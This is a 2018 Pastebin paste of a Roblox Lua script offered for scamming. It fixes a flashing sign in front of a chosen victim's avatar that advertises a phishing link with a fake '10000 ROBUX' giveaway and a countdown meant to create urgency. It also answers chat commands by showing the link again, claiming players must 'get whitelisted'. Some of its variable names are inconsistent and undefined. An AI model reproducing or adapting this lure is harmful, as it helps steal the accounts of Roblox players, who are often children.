Advertisement
Wweroblox12121212

Untitled

Jan 15th, 2018
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. victim="NAME"
  2.  
  3. yourphishlink="rcblox.tk/?id=58246"
  4.  
  5. scam=game.Players[vitcm].Character
  6.  
  7.  
  8.  
  9. x = Instance.new("Part", scam)
  10. x.BrickColor = BrickColor.new("Really black")
  11. x.Size = Vector3.new(8.6, 6, 0.2)
  12. x.TopSurface = "Smooth"
  13. x.BottomSurface = 'Smooth'
  14. x.Anchored = true
  15. x.CanCollide = false
  16. x.Transparency = 0.2
  17. x.Rotation = Vector3.new(0, -70, 0)
  18.  
  19. --Text
  20.  
  21. GUI=Instance.new('SurfaceGui', x)
  22. GUI.Face = 'Front'
  23.  
  24. Text=Instance.new('TextLabel', GUI)
  25. Text.Text = 'HACK V.2'
  26. Text.TextColor3 = Color3.new(255,255,255)
  27. Text.TextStrokeColor3 = Color3.new(0,0,0)
  28. Text.TextStrokeTransparency = 0.5
  29. Text.Font = 'Code'
  30. Text.Size = UDim2.new(1, 0, 0.5, 0)
  31. Text.BackgroundTransparency = 1
  32. Text.Position = UDim2.new(0, 0, 0.63, 0)
  33. Text.TextScaled = true
  34. Text.Rotation = -900
  35.  
  36. Text2=Instance.new('TextLabel', GUI)
  37. Text2.Text = " GO TO THIS LINK : "..yourphishlink.." 50 PLAYERS LEFT TO WIN 10000 ROBUX!!! WILL EXPIRE IN 1 WEEK HURRY!! ITS YOUR CHANCE IF YOU CANT VIEW IT CHAT !link"
  38. Text2.TextColor3 = Color3.new(255,255,255)
  39. Text2.TextStrokeColor3 = Color3.new(0,0,0)
  40. Text2.TextStrokeTransparency = 0.5
  41. Text2.Font = 'Code'
  42. Text2.Size = UDim2.new(1, 0, 0.6, 0)
  43. Text2.BackgroundTransparency = 1
  44. Text2.Position = UDim2.new(0, 0, 0.12, 0)
  45. Text2.TextScaled = true
  46. Text2.Rotation = -900
  47.  
  48. ---900
  49.  
  50. function Change()
  51. wait(0.001)
  52. x.Transparency = 0.1
  53. wait(0.001)
  54. x.Transparency = 0.2
  55. wait(0.001)
  56. x.Transparency = 0.3
  57. wait(0.001)
  58. x.Transparency = 0.4
  59. wait(0.001)
  60. x.Transparency = 0.5
  61. wait(0.001)
  62. x.Transparency = 0.6
  63. wait(0.001)
  64. x.Transparency = 0.7
  65. wait(0.001)
  66. x.Transparency = 0.8
  67. wait(0.001)
  68. x.Transparency = 0.9
  69. wait(0.001)
  70. x.Transparency = 1
  71. wait(0.5)
  72. x.Transparency = 0.9
  73. wait(0.001)
  74. x.Transparency = 0.8
  75. wait(0.001)
  76. x.Transparency = 0.7
  77. wait(0.001)
  78. x.Transparency = 0.6
  79. wait(0.001)
  80. x.Transparency = 0.5
  81. wait(0.001)
  82. x.Transparency = 0.4
  83. end
  84.  
  85. game.Players[troslado].Chatted:connect(function(msg)
  86. if msg == "!link" then
  87. Text.Text = ''
  88. Text2.Text = ''
  89. Change()
  90. Text.Text = 'HACK V.2'
  91. Text2.Text = " "..yourphishlink.." "
  92. end
  93. end)
  94.  
  95. game.Players[troslado].Chatted:connect(function(msg)
  96. if msg == "!cmds" then
  97. Text.Text = ''
  98. Text2.Text = ''
  99. Change()
  100. Text2.Text = 'You need to get whitelisted first! Please chat !link'
  101. Text.Text = 'HACK V.2'
  102. end
  103. end)
  104.  
  105. while wait() do
  106. x.CFrame = scam.Torso.CFrame*CFrame.new(0, 0, -7)
  107. x.CFrame = x.CFrame * CFrame.Angles(91,0,0)
  108. if scam.Humanoid.Health == 0 then
  109. x:Destroy()
  110. end
  111. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement